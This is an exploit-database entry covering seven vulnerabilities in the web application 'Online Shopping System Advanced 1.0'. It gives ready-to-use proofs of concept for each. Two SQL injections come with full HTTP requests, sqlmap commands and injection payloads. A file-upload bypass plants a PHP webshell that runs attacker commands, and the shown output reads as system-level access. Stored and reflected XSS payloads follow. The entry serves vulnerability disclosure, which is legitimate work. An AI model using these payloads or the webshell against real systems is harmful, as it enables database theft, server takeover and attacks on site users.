Exploit for Online Shopping System Advanced 1.0 XSS / SQL Injection / Code Execution

Name: Exploit for Online Shopping System Advanced 1.0 XSS / SQL Injection / Code Execution
Rating: 5 (256 reviews)
2023-03-28 | CVSS 6.8
## https://sploitus.com/exploit?id=PACKETSTORM:171532
# Exploit Title: Online shopping system advanced 1.0 - Multiple  
Vulnerabilities  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2020-09-24  
# Vendor Homepage:  
https://github.com/PuneethReddyHC/online-shopping-system-advanced  
# Software Link :  
https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip  
# Tested Version: 1.0  
# Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache +  
php 5.X/7.X + MySQL  
  
# Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7  
vulnerabilities  
  
# Vulnerability Type: SQL Injection - #1  
  
CVSS v3: 9.8  
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-89  
  
Vulnerability description: Online shopping system advanced 1.0 allows SQL  
injection via the admin/edit_user.php, user_id parameter.  
  
Proof of concept:  
  
Save this content in a file:  
  
POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: multipart/form-data;  
boundary=---------------------------120411781422335  
Content-Length: 489  
Origin: http://127.0.0.1  
Connection: keep-alive  
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25  
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263  
Upgrade-Insecure-Requests: 1  
Host: 127.0.0.1  
  
-----------------------------120411781422335  
Content-Disposition: form-data; name="user_id"  
  
25  
-----------------------------120411781422335  
Content-Disposition: form-data; name="email"  
  
otheruser@gmail.com  
-----------------------------120411781422335  
Content-Disposition: form-data; name="password"  
  
puneeth@123  
-----------------------------120411781422335  
Content-Disposition: form-data; name="btn_save"  
  
  
-----------------------------120411781422335--  
  
  
And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id  
  
(custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to  
keep testing the others (if any)? [y/N]  
sqlmap identified the following injection point(s) with a total of 115  
HTTP(s) requests:  
---  
Parameter: MULTIPART user_id ((custom) POST)  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: -----------------------------120411781422335  
Content-Disposition: form-data; name="user_id"  
  
25' AND SLEEP(5) AND 'HGWF'='HGWF  
-----------------------------120411781422335  
Content-Disposition: form-data; name="email"  
  
otheruser@gmail.com  
-----------------------------120411781422335  
Content-Disposition: form-data; name="password"  
  
puneeth@123  
-----------------------------120411781422335  
Content-Disposition: form-data; name="btn_save"  
  
  
-----------------------------120411781422335--  
---  
[16:25:28] [INFO] the back-end DBMS is MySQL  
web application technology: Apache 2.4.38, PHP 5.6.40  
back-end DBMS: MySQL >= 5.0.12  
  
  
# Vulnerability Type: SQL Injection - #2  
  
CVSS v3: 9.8  
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-89  
  
Vulnerability description: Online shopping system advanced 1.0 allows SQL  
injection via the action.php, proId parameter.  
  
Proof of concept:  
  
Save this content in a file:  
  
POST http://127.0.0.1/online/action.php HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: */*  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 49  
Origin: http://127.0.0.1  
Connection: keep-alive  
Referer: http://127.0.0.1/online/  
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263  
Host: 127.0.0.1  
  
addToCart=1&proId=70  
  
  
And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId  
  
POST parameter 'proId' is vulnerable. Do you want to keep testing the  
others (if any)? [y/N]  
sqlmap identified the following injection point(s) with a total of 72  
HTTP(s) requests:  
---  
Parameter: proId (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv  
---  
[16:03:38] [INFO] the back-end DBMS is MySQL  
web application technology: Apache 2.4.38, PHP 5.6.40  
back-end DBMS: MySQL >= 5.0.12  
  
  
# Vulnerability Type: Remote Command Execution (RCE)  
  
CVSS v3: 9.8  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-434  
  
Vulnerability description: File Restriction Bypass vulnerabilities were  
found in Online shopping system advanced v1.0. This allows for an  
authenticated user to potentially obtain RCE via webshell.  
  
Proof of concept:  
  
1. Go the add product >> (admin/add_product.php)  
2.- Select product image and load a valid image.  
3. Turn Burp/ZAP Intercept On  
4. Select webshell - ex: shell.php  
5. Alter request in the upload...  
Update 'filename' to desired extension. ex: shell.php  
Not neccesary change content type to 'image/png'  
  
Example exploitation request:  
  
====================================================================================================  
  
POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: multipart/form-data;  
boundary=---------------------------184982084830387  
Content-Length: 960  
Origin: http://127.0.0.1  
Connection: keep-alive  
Referer: http://127.0.0.1/online/admin/add_product.php  
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263  
Upgrade-Insecure-Requests: 1  
Host: 127.0.0.1  
  
-----------------------------184982084830387  
Content-Disposition: form-data; name="product_name"  
  
demo2  
-----------------------------184982084830387  
Content-Disposition: form-data; name="details"  
  
demo2  
-----------------------------184982084830387  
Content-Disposition: form-data; name="picture"; filename="shell.php"  
Content-Type: image/gif  
  
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>  
-----------------------------184982084830387  
Content-Disposition: form-data; name="price"  
  
1  
-----------------------------184982084830387  
Content-Disposition: form-data; name="product_type"  
  
1  
-----------------------------184982084830387  
Content-Disposition: form-data; name="brand"  
  
1  
-----------------------------184982084830387  
Content-Disposition: form-data; name="tags"  
  
Summet  
-----------------------------184982084830387  
Content-Disposition: form-data; name="submit"  
  
  
-----------------------------184982084830387--  
  
====================================================================================================  
  
6. To view the webshell path go to Product List (admin/cosmetics_list.php)  
7. Send the request and visit your new webshell  
Ex:  
http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami  
nt authority\system  
  
# Vulnerability Type: stored Cross-Site Scripting (XSS) - #1  
  
CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79  
  
Vulnerability description: Online shopping system advanced v1.0, does not  
sufficiently encode user-controlled inputs, resulting in a stored  
Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in  
multiple parameter.  
  
Proof of concept:  
  
Stored:  
  
POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: multipart/form-data;  
boundary=---------------------------120411781422335  
Content-Length: 496  
Origin: http://127.0.0.1  
Connection: keep-alive  
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25  
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263  
Upgrade-Insecure-Requests: 1  
Host: 127.0.0.1  
  
-----------------------------120411781422335  
Content-Disposition: form-data; name="user_id"  
  
25  
-----------------------------120411781422335  
Content-Disposition: form-data; name="email"  
  
otheruser@gmail.com  
-----------------------------120411781422335  
Content-Disposition: form-data; name="password"  
  
</td><script>alert(1);</script><td>  
-----------------------------120411781422335  
Content-Disposition: form-data; name="btn_save"  
  
  
-----------------------------120411781422335--  
  
  
# Vulnerability Type: stored Cross-Site Scripting (XSS) - #2  
  
CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79  
  
Vulnerability description: Online shopping system advanced v1.0, does not  
sufficiently encode user-controlled inputs, resulting in a stored  
Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in  
multiple parameter.  
  
Proof of concept:  
  
Stored:  
  
POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 192  
Origin: http://127.0.0.1  
Connection: keep-alive  
Referer: http://127.0.0.1/online/admin/add_user.php  
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263  
Upgrade-Insecure-Requests: 1  
Host: 127.0.0.1  
  
first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save=  
  
  
# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1  
  
CVSS v3: 6.1  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79  
  
Vulnerability description: Online shopping system advanced v1.0, does not  
sufficiently encode user-controlled inputs, resulting in a reflected  
Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in  
page parameter.  
  
Proof of concept:  
  
Reflected:  
  
http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E  
  
  
# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2  
  
CVSS v3: 6.1  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79  
  
Vulnerability description: Online shopping system advanced v1.0, does not  
sufficiently encode user-controlled inputs, resulting in a reflected  
Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php,  
in page parameter.  
  
Proof of concept:  
  
Reflected:  
  
http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E